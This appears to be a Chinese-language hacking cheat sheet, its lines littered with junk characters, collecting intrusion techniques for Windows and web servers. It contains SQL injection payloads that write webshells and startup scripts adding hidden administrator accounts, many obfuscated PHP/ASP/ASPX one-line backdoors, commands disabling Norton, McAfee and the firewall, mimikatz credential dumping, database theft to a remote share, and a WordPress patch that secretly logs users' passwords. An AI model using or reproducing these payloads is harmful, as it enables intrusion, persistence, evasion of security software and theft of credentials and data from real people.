7 {! E: F: n7 a& L5 i0 Z( @, k b1 D
use test;8 g. E, n F8 c2 C7 C8 K
create table a (cmd text);
) R6 j# K" W/ E# Vinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
, M2 }/ s9 e- e' @# l& e& T1 hinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
$ Y. v' e* U; s$ Q! Einsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );. A6 R0 C4 F- B1 r) h
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
% {5 h9 j2 D1 y! h0 L, w! H2 h: Odrop table a;
$ F2 L/ K9 ?5 k$ ] d. Y& }( r. m3 B5 W$ g( Q. Z
英文版本:7 d; E9 ], c$ i2 S" _
; X+ g) C1 H: h1 v/ ]; q/ S7 guse test;8 z/ W. N( E: k1 O
create table a (cmd text);( S6 r9 S9 d7 Q) c3 r
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
# n5 X. h; j8 ~! w! r8 T3 Qinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
) f: L" [, D8 l/ [8 D9 W0 linsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
0 ^! C/ l- q# n# sselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";) L6 Z. m9 v5 l; y
drop table a;
6 E( s# l3 V$ ~" t1 N M' r, e
6 Y6 W' e( e5 N: O* i3 @' e3 Zcreate table a (cmd BLOB);- @% o! T8 |# Q; R
insert into a values (CONVERT(木马的16进制代码,CHAR));; ]! }2 p2 H& S9 |6 H
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
- c3 G& c- n& f0 j% U. S' u% adrop table a;/ B7 `7 U4 [4 P8 k
$ @% c4 W0 p! ^! s记录一下怎么处理变态诺顿8 `: ~, X' L& ~# T
查看诺顿服务的路径
3 o \+ K# f4 R* @sc qc ccSetMgr, G$ z. a! `. X4 h Y0 j, r
然后设置权限拒绝访问。做绝一点。。
* T" t1 }. a4 x( b9 t/ Pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
& l7 q5 V3 F2 ^0 z' d: B0 }) ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"# [4 l+ s8 E( N& [1 F8 B9 r
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
( M& [1 t; h6 t5 H' fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
% ^, D1 O) o- s, F+ F+ G b, I+ s3 B$ l/ k* _
然后再重启服务器
1 k; L$ A* H. P4 Qiisreset /reboot
2 }% U6 B6 s# }% L% v这样就搞定了。。不过完事后。记得恢复权限。。。。9 M7 R; |* y7 M
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
. w9 }$ ~' _& q( a% K- g( scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F' f) E( j i+ L7 n( h# B, V" r
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
$ L8 k3 |: F( ~6 K. Dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
' U1 ^9 s3 l* t% wSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
; `7 ] r% R8 K/ m$ `4 T
+ ]+ G- I, H$ p$ q7 }% AEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
# b* z* W7 X) n5 F
0 o! v$ G# D2 ` e# Qpostgresql注射的一些东西6 W1 l# c8 x' Y3 _! T: B" j; l. D
如何获得webshell
+ l/ Y6 `8 R7 z6 p, Q+ N/ shttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 8 {- v! U6 U5 z9 W! v
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); % f7 @1 C3 r) l' E
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
5 i# i7 O# v6 d( k9 i& M如何读文件
* N( }2 O/ F I- A: ]http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);, C% S* |0 O: F' Q# Z0 v1 \4 P, l5 L
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;& }3 H' f3 W& Y$ B7 x' O: \$ e
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
L$ O X, ]1 L- \' a% b1 q9 N9 k. T/ M2 X" t# Q
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。7 E3 |$ G( w' V/ \) t1 Z! [/ I& V
当然,这些的postgresql的数据库版本必须大于8.X
7 M% ^* r0 p- s. ?创建一个system的函数:
( Q% ?2 c; q; U( T) v' mCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT _: W2 S9 w% `9 i: l% x
( _& W6 Q4 B% B( d创建一个输出表:
3 ~ R7 Q2 t: Z! c# M8 L/ v8 ]CREATE TABLE stdout(id serial, system_out text)9 E7 q+ C! z: q0 V# X" y* J
" n- ^% H1 w# ]0 F* c/ W2 R执行shell,输出到输出表内:
- K" `; s$ P5 r2 h1 I, z0 ISELECT system('uname -a > /tmp/test')' R* |0 S) r. u, }
5 M3 Z/ r, I+ k5 m0 t6 D
copy 输出的内容到表里面;2 A2 d' V5 o* n: g! ?' N
COPY stdout(system_out) FROM '/tmp/test'4 Z. }9 Z3 t% H. I
1 b5 y l9 U' H
从输出表内读取执行后的回显,判断是否执行成功8 Z$ X% T5 i3 M; W v
0 @. i& W, U) I' e, I7 P' E2 D$ k
SELECT system_out FROM stdout
' C3 i- o/ [* [" Q4 d下面是测试例子
4 p+ x: Z/ p0 r
( D4 _7 t# l; U/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
, l' F' D- e5 e8 F( v; [+ T' H) }: }' u: z
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'8 B. F5 x. W( F6 ?& E( P- E
STRICT --
/ o! X6 Q/ ?" N3 d! h6 C
6 S" T Z7 i. A: A. n. w) R' H/store.php?id=1; SELECT system('uname -a > /tmp/test') --/ H/ Y4 J% G8 K( G% v4 S9 D$ i
3 z" I8 @6 i$ f5 f: O- k5 P3 T/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --2 ]" r) y* q) z1 N
- t+ |* y. K* g B/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--: y. x. V, H s. B; s T) H: Z& M
net stop sharedaccess stop the default firewall5 t( z( a5 ^* C# \+ T/ r7 a
netsh firewall show show/config default firewall; y* {- x1 y* F9 i& ~
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall: X: V4 f0 z! o, H0 {
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
/ O0 w( W3 h0 b7 P4 @' K修改3389端口方法(修改后不易被扫出)
: j2 f) P; C" X5 T" U# ^修改服务器端的端口设置,注册表有2个地方需要修改) J2 Q! e2 {( z# t' b
^. P5 f1 r% F) t) N[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]+ P+ {* q! V) O1 D
PortNumber值,默认是3389,修改成所希望的端口,比如6000
/ C% ?1 i5 K3 K K: i- m( z0 }. ^! S4 e9 y& E. S
第二个地方:
* H7 m( U: _9 J& O[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
& N! x$ ~, z9 o1 _PortNumber值,默认是3389,修改成所希望的端口,比如6000
( b1 T k1 b0 j5 i; S4 @+ H
' j$ t( y6 p( W) [7 x现在这样就可以了。重启系统就可以了
3 Y5 h% o. c0 K0 n6 c; l7 u! P2 i ] G. \( h3 a
查看3389远程登录的脚本# j; e6 V! O- d
保存为一个bat文件
# q' f' u/ p% z( z5 g4 ldate /t >>D:\sec\TSlog\ts.log. J) i% J/ I5 @% {
time /t >>D:\sec\TSlog\ts.log+ P+ t8 ~/ W! f2 Z- i" q" I
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
* K; |' g* _7 M& pstart Explorer$ K$ d2 k9 v. O7 c2 X% P1 T
, V5 @* E# R6 s: g% A1 u. q5 cmstsc的参数:
6 k0 p, u" P* H4 l! t' q, |& K0 W8 M* M$ A# ~2 W1 R s
远程桌面连接
6 } ^4 |0 y: g/ h& `$ `0 A1 }6 R
5 r4 m; Z' Q1 G7 eMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
9 L9 h$ f) X6 I7 ?2 v6 ^4 o; B [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
" x/ S0 y \7 X4 ~ o; y5 m" c/ r- C; n
6 o3 r1 A6 _& S7 r# o! D<Connection File> -- 指定连接的 .rdp 文件的名称。
* R6 S: y; a) t
; L& s5 ^1 i5 z5 {) a* W8 o/v:<server[:port]> -- 指定要连接到的终端服务器。$ z8 e& }! ~0 |! ^ ^! E/ @
$ G+ O% a3 V" L6 M s: ^- o A- ~- [/console -- 连接到服务器的控制台会话。
# r" i+ y! l! b @, X3 R" W% e" L# a9 O; z. r+ a
/f -- 以全屏模式启动客户端。
$ f) C/ f0 Z0 k" p: v: u0 R1 @( g
( C! v$ h$ R# r! k! m5 `- f/ ]. J! m/w:<width> -- 指定远程桌面屏幕的宽度。1 Q, d3 R2 Q$ {+ o' q
7 K3 r( b! D' ?) ~' X
/h:<height> -- 指定远程桌面屏幕的高度。
+ y/ n Y; }' }* X% @% e' U! z! D; @0 Z6 X0 Y6 P# C
/edit -- 打开指定的 .rdp 文件来编辑。1 q* F* B `* V7 a8 D/ M1 u5 ]4 v
1 q0 G' J# C( Y- |3 W
/migrate -- 将客户端连接管理器创建的旧版. J3 S& A, Q8 [5 c- E
连接文件迁移到新的 .rdp 连接文件。
5 o/ T' o; D* W. d/ d# _5 h& T1 P9 r4 b. t; m
' q: J$ v4 G- {- D+ H. H6 P其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就8 T& \3 g3 Y. g# L- y' g
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
9 K: k0 y- e7 ?, F& \* i0 b$ @& E. M0 l# F
命令行下开启3389, x9 A8 L- V' H: e
net user asp.net aspnet /add9 \- }( k2 \1 o% a% z! c% j* o2 J
net localgroup Administrators asp.net /add/ G, B; r. b* |. z. a1 x
net localgroup "Remote Desktop Users" asp.net /add
6 `6 v- @ q$ u1 `5 k: E. \attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D( T( L+ Z, S- O2 g
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
- x8 n6 M5 f/ M9 v j% ~echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 13 G4 @1 ~$ \1 ^3 Q. W3 W5 S
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
$ {% S! R# A" L# Isc config rasman start= auto3 f0 B" l5 d, r$ r
sc config remoteaccess start= auto/ J1 m* f. l: ~9 X
net start rasman9 s. Q, }8 {: |
net start remoteaccess
+ e9 h s/ F3 P! V4 }+ _Media
" y% \) d8 b& z- D<form id="frmUpload" enctype="multipart/form-data" z4 c% O9 y4 T8 ]. Y6 |/ K+ N
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
0 E4 H" s& z- ^' s! C<input type="file" name="NewFile" size="50"><br>
. Y; `; O: h. Z8 k: H' x) L<input id="btnUpload" type="submit" value="Upload">7 [* f& }- |- _& ]: U0 c# h) X
</form>
4 H" ?4 |( ^ H4 D/ Y* S" k4 L" w/ N7 e( D$ X" C
control userpasswords2 查看用户的密码4 b$ D$ K ]3 Q; l4 q5 K, F8 l l
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径0 k) j# z$ g8 H% w: f) x
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a' ~6 m8 g) Y2 [+ v% H$ O$ ~8 ^: F. y
- A& H8 R# @( Q# M6 e2 t+ y5 M. j* J141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
`2 V$ R5 x' b, L% S$ E测试1:$ q* O5 V* s+ t3 i$ u* @1 b
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1$ r+ |2 W. `4 G: ?/ N$ O
$ o; f; B `6 E4 [9 ^7 K3 ~
测试2:
0 r) J2 G( P* L, G9 X
, r2 f G$ M2 W" l8 Screate table dirs(paths varchar(100),paths1 varchar(100), id int)6 B+ g4 i7 G K1 f$ {/ E
6 X, m" q3 z& {
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--0 \7 N& T: n0 a/ _$ w
0 D( l ~5 ^" d1 a2 R, e4 ~
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t10 B, M6 l F! N& B+ n; i
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令2 ?/ q E1 ~) J q! h# S
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
5 P G- S+ T) n% Cnet stop mcafeeframework8 r. t3 v7 w% o; n$ T
net stop mcshield+ [ A% }! F8 n3 I) T( D3 P
net stop mcafeeengineservice
4 U6 S% r1 J# h! W' q( s5 cnet stop mctaskmanager" U/ P2 Q: W) U: S" C$ \2 V
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D# C: Z! K, _8 B X
" O& s7 @5 t; `& K `% ? k4 A: p VNCDump.zip (4.76 KB, 下载次数: 1) 8 Z9 `, w- J$ S9 B' ^! d
密码在线破解http://tools88.com/safe/vnc.php: K+ s0 W4 A! X! x4 j
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取# |# Q! s8 I" J/ h. q2 u
9 }# o; a; f2 `' B
exec master..xp_cmdshell 'net user', B9 \6 D7 { C
mssql执行命令。
) s% y" {* e8 Y& h# W获取mssql的密码hash查询+ n( x2 _0 a5 w$ t) p
select name,password from master.dbo.sysxlogins% w8 o1 p& V' x G( d& Y* Y( Z
' z* u) \# I+ |5 w& Z x) W6 d
backup log dbName with NO_LOG;# e& r( e7 ~ }. k+ h+ G! F, U
backup log dbName with TRUNCATE_ONLY;: T7 e9 t9 T6 c" Y6 ?- p( d1 A5 m
DBCC SHRINKDATABASE(dbName);# f, ~ @% S! _3 j( `: Z2 {* l
mssql数据库压缩/ r) H" V1 p5 G& p. g. q2 Y: r
- Q2 B- m3 ? S4 T ARar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK: F0 v; |: H5 X- B0 r- J" r
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
T. M( m. E) Y1 T1 x. k5 b, u, T+ l8 @( r- r( O& l7 f
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'' \ B. |; }/ |) E. `
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
( U/ i$ b4 s- r+ W& n
+ F: j- b' m) e8 b- S" d' g8 _Discuz!nt35渗透要点:
2 c! f6 H4 p$ Q; K(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default& a% A& z9 |$ Z/ w* A
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
& g( k* S5 @& i( b# a( y(3)保存。3 `6 ]- H$ q% m5 `2 M
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
3 o5 ^5 s* R3 `: \ ^6 Pd:\rar.exe a -r d:\1.rar d:\website\* h1 D5 V. P, h" q( u
递归压缩website q1 S+ |" p& O% c% N! E
注意rar.exe的路径9 i; T- g8 H# Z0 A0 x
) o. H$ q" E N/ O: r) E9 g Q
<?php+ ?7 w7 {( N' ~1 u3 {4 E
5 I' a3 e9 v$ z' S8 U% {. |$telok = "0${@eval($_POST[xxoo])}";
) A$ m7 _' o. F+ v6 u
6 |+ f6 Z% Z+ E- L$username = "123456";' W0 m3 H& ]2 D' x( O
: q* S( s7 ^0 V. c0 D6 j& h; a$userpwd = "123456";
/ Q2 H9 h5 I4 i+ V& T8 w" l5 [
$telhao = "123456";
! c. B: S3 H5 r0 u& v' H
+ V; _4 F8 ]# T) K2 N# ?) R$telinfo = "123456";( m, u; b' U6 D5 f/ x( l3 _9 ^
% V4 y. o; u) d$ U# J e1 f. S?>5 O. U: @1 K( E' o. C, C0 n
php一句话未过滤插入一句话木马
# `5 m" t; c+ b
3 u/ R. o$ @7 c* m7 Y站库分离脱裤技巧/ F5 B) _: W; [9 Z4 X% {& `+ |
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'( i- }$ i1 {+ H$ }2 Q6 V: n# p
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'- f- b- X+ S2 l. [* w3 w" Z- R1 t
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
) k6 I3 o5 K* C这儿利用的是马儿的专家模式(自己写代码)。5 a7 z/ h& p9 \( j' D
ini_set('display_errors', 1);$ q! [5 @# G. ~8 y/ k- a
set_time_limit(0);
I( ~. p8 C" `error_reporting(E_ALL);
4 ?! D6 R/ q5 K6 c- _5 M0 z& w8 Y4 [$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());" I& E( m- b1 N3 }/ [+ _
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());, r" b0 L% Y5 B) Q$ ?9 Z
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());7 R5 p' E) V; i2 V$ u' K W2 f
$i = 0;
/ h% a$ D, Z1 ^4 n9 e4 z# \. V$tmp = '';
8 v' B' e N! x7 awhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
3 H' L& h; ?; @ $i = $i+1;/ C; ]# i" G0 m) u7 a
$tmp .= implode("::", $row)."\n";! Q, ~9 Q+ H8 q8 k: r
if(!($i%500)){//500条写入一个文件. S! S U! X1 J! K6 v/ u
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
, L6 ^' i( E$ r; [# I file_put_contents($filename,$tmp);/ P) |, v F2 J5 |! D
$tmp = '';+ J: B4 X' s% R# o- m
}; z4 C5 L3 }' W
}
! c1 c c2 y5 [- E4 fmysql_free_result($result);5 R$ b6 I- R- |% n3 R
: w5 y; U" C+ `. J( C b0 t9 i0 E7 T# c$ i
; R8 I7 H4 a/ Z7 x n' W" w. _//down完后delete; K% J5 c9 ^" E4 P8 K" n
9 D) w( V" S2 `
/ o" j/ s3 Q# P3 Q6 h# f
ini_set('display_errors', 1);
! f5 i# b/ k5 h( ~error_reporting(E_ALL);6 T2 A3 e8 B. i. E
$i = 0;
. E& ?2 ]5 M7 u3 |8 o! G5 Rwhile($i<32) {& {: v c, j/ w$ N3 ]; `* u4 }, }
$i = $i+1;
% ?7 k9 t+ L# ]' F. D! ^* ?( V $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';3 g& d7 C; E( M! c3 U* Z8 @6 M
unlink($filename);5 {: T# J' S7 |( j
}
9 c: ^/ Z; y% l7 \) lhttprint 收集操作系统指纹" s& r" Q+ Y0 S9 b) D5 J
扫描192.168.1.100的所有端口 l' T9 k$ q2 x9 q9 \: O$ a
nmap –PN –sT –sV –p0-65535 192.168.1.1006 f7 T" r9 T2 i
host -t ns www.owasp.org 识别的名称服务器,获取dns信息* ]) R9 f+ d& }# o' V; A3 d; Q
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
; T2 O% G* C H. u; n0 y: x7 PNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
/ C9 g4 x/ z2 W; o% k# ~
9 G3 a8 \0 k6 ZDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)& K3 m$ ]' L2 Z# F4 J
! h4 v2 r! _' K! y2 u. e MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
" B z/ W$ g' v% t4 r9 B, r- F( |0 a' P1 O
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
0 M, L9 T$ | ^" w& @2 M" V. I6 T% M8 h9 g9 l
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)4 c0 }+ i! e2 K( X. A. t
6 l* N7 A; H5 M1 X" z- D3 _& P http://net-square.com/msnpawn/index.shtml (要求安装)
$ h" u6 F2 b" ^" Y w1 q
9 W4 x ` ?6 y+ P8 k tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
/ [7 Z: X' z5 b) U9 [8 R7 _
( K% Z5 r# k W- _+ W! ] SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)% _$ L( H; ^ I; f, x& J0 J
set names gb2312
" }2 l# k. S3 \8 c导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。$ w3 c ~0 |' o1 d+ K, B7 D- O( \
* l4 M# t% K2 h. _' Smysql 密码修改4 k: b1 Y! J2 J" j
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” $ A1 s8 W6 {$ X$ a
update user set password=PASSWORD('antian365.com') where user='root';
3 L! `' U. e" Pflush privileges;3 ]: f/ ^! a2 @2 d& n9 G
高级的PHP一句话木马后门' g: y4 a: I' }( p
5 J# {& I1 @9 ]7 r! i2 j* S
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀( H! k. m/ x6 s0 I
( w( g. P' Z' \- g; k
1、* o, k- e9 s& G0 ~7 ~6 X
) M7 O ^ Q0 }9 Y8 @1 B. C3 d2 D$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";) u& M# h, r, Y- {. @" G
0 Q* d( s9 O0 p! g! t$hh("/[discuz]/e",$_POST['h'],"Access");1 j3 B; Z9 D8 R& l
, R- H- a$ N/ f( I
//菜刀一句话
$ p1 p7 A* d3 [$ ]+ K5 g% S9 Y5 E# o/ N% s3 [. q# \) U/ ]
2、, J. ]; _$ Y* l2 w' r1 Z% ^
/ O2 ?+ h3 I7 W b$ T' q# R$filename=$_GET['xbid'];- Z* f* R8 U7 H2 O0 e! g. |6 Q
- G; I: T2 z8 ~; winclude ($filename);/ e3 M* x! y( V# D* C4 B8 p: u* Z
9 N6 I/ z% \4 \3 [7 I& p# _! v
//危险的include函数,直接编译任何文件为php格式运行# J$ o" K4 m% F# [5 f9 D
- _3 t. `! A( ]( U1 H& m5 o% A
3、7 f4 y) x6 c! K
5 H. E1 j+ `: T& _* z* a6 a
$reg="c"."o"."p"."y";
+ ~2 [. Y! K. B* C& \8 e
( X* i& x/ K- x$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
% T. X- j/ k" I
. @0 G: p7 Z s( k) d//重命名任何文件$ [4 ]% E" V- E( v/ t
: q/ G, U2 g' {. ~& X( B" _4、
1 q4 w1 g( F6 N
! m0 ^8 f; L4 V: r1 Y: U0 ^* ~$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";9 k5 w6 }# }7 c& F+ k& p' \6 J
/ E" l/ m, D9 `' S" s4 [! r6 `$gzid("/[discuz]/e",$_POST['h'],"Access");( ^' Q2 k: ~( A1 m) @5 c
# v" m1 F% i! O, c
//菜刀一句话
& J4 j. Q( Q9 o' d7 L$ Q; P
& K1 _1 {0 w" q" }5 f5、include ($uid);
4 O' Q# d- \# H( f, T% {5 r: f$ \1 \) g3 A
//危险的include函数,直接编译任何文件为php格式运行,POST
# X+ C3 {& I/ T+ V. h% w, S: z. Y% M7 t& r
, @& b% h' Y8 i0 E/ R% H5 x
//gif插一句话
( R: N7 H9 C# P8 `4 z" @: j
G1 c& [) j; c; m D+ h+ Y6、典型一句话8 [8 E. P! L2 x7 X
3 d3 L( {, u( i( A6 b6 w4 P程序后门代码7 C0 b6 w% W# K
<?php eval_r($_POST[sb])?>. o; k0 Z1 K7 g( ]% Q7 V+ r
程序代码
& ~! C5 {( z6 S j7 {<?php @eval_r($_POST[sb])?> _* f* U) F' E
//容错代码
+ s# b& b0 b2 N, V- m+ ?; u, @- Q程序代码+ j6 L9 t3 z* ]$ w" K* w( a6 `
<?php assert($_POST[sb]);?>
1 {% U. N% b7 B+ Y( d4 G1 e//使用lanker一句话客户端的专家模式执行相关的php语句
+ C- |, h' B3 N+ h; u% W程序代码, y9 Y9 u! |$ N R$ x; Q1 a
<?$_POST['sa']($_POST['sb']);?>
& I- }3 `; D% [% \- r1 I/ e: C程序代码: y$ L. I# N% y( p4 T9 m! ?! C* ]
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>9 _5 I' t& c/ t3 S$ w, X
程序代码3 C7 }; C1 x+ t2 _7 f
<?php" U/ z4 p L" J& n% `0 ~3 d% V4 n% W
@preg_replace("/[email]/e",$_POST['h'],"error");7 l$ e+ S7 ?5 Y# A% p- ~+ E' a
?>
5 @9 |, v. Y$ g5 Y//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
: y* Q5 u# Y+ z9 b程序代码
* u/ ^8 T4 ]" \( r<O>h=@eval_r($_POST[c]);</O>
, H4 i" \$ U3 ^9 [4 k. o' }程序代码
2 b; y7 `) U. s; K( v& R4 L" m<script language="php">@eval_r($_POST[sb])</script>5 A8 H3 Z/ u$ q& K# f$ C& h: ^+ {
//绕过<?限制的一句话9 [( C& g8 z" D7 S
; n; F, _3 ~- S7 d# x J C9 x
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip' k8 Y3 }8 y z6 J! `; U
详细用法:/ A# G7 r+ V/ O. q& ]! O, o
1、到tools目录。psexec \\127.0.0.1 cmd
1 r9 C* ~8 O( D' n. ~# i, ^1 B9 k2、执行mimikatz( R2 t- X$ q! F
3、执行 privilege::debug+ w+ i* k k+ u" w# n
4、执行 inject::process lsass.exe sekurlsa.dll& O& |, x& G& z8 i/ a" e
5、执行@getLogonPasswords5 s( c. k, C# l* u) E
6、widget就是密码5 p2 b4 L. J# a U+ a: K7 j0 \# n
7、exit退出,不要直接关闭否则系统会崩溃。
. P2 `; T; m5 c, b8 m
0 r2 E# x' g o# \0 Hhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面- M: C7 r+ m" X" U' d+ w6 D& g$ o
' D& z0 T, T! @# u/ ?* J
自动查找系统高危补丁
, g$ N- u6 o. o k0 ~systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt5 X" e I& p1 u( `& V
7 f1 m) d: p( ]突破安全狗的一句话aspx后门
G0 c5 t3 O4 }<%@ Page Language="C#" ValidateRequest="false" %>3 U2 e4 M$ f* T/ m3 d8 I% v' _
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
! G) ^5 [: H* B8 a. m% p6 q) Vwebshell下记录WordPress登陆密码
1 c9 c i; x- d2 [6 z |, n# Y/ Swebshell下记录Wordpress登陆密码方便进一步社工
7 V* J6 l( N/ B' |) f+ Z9 J在文件wp-login.php中539行处添加:
! C; a/ N6 H+ z; z; w/ ?9 y// log password% \ ]: _7 h' }# E A) @& z
$log_user=$_POST['log'];
2 E3 J8 f ? U- K$ }, F$log_pwd=$_POST['pwd'];2 Z- ?" L7 R2 K6 G% Q% }% _$ W( y
$log_ip=$_SERVER["REMOTE_ADDR"];
3 A, {/ j i( [: H1 m$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;- E( @) F* A9 W; z3 A* c& @& U. j
$txt=$txt.”\r\n”;' M, V1 H. f6 e* T. M$ |/ j
if($log_user&&$log_pwd&&$log_ip){
m L5 @! V# {@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
% @) R& S' a) y) s3 Z}
( K9 j; ?4 B2 |' F: {9 I当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。; ]/ I5 e2 F* w+ k" l" E
就是搜索case ‘login’# C9 B8 T! j- X6 e7 \* G7 u
在它下面直接插入即可,记录的密码生成在pwd.txt中,
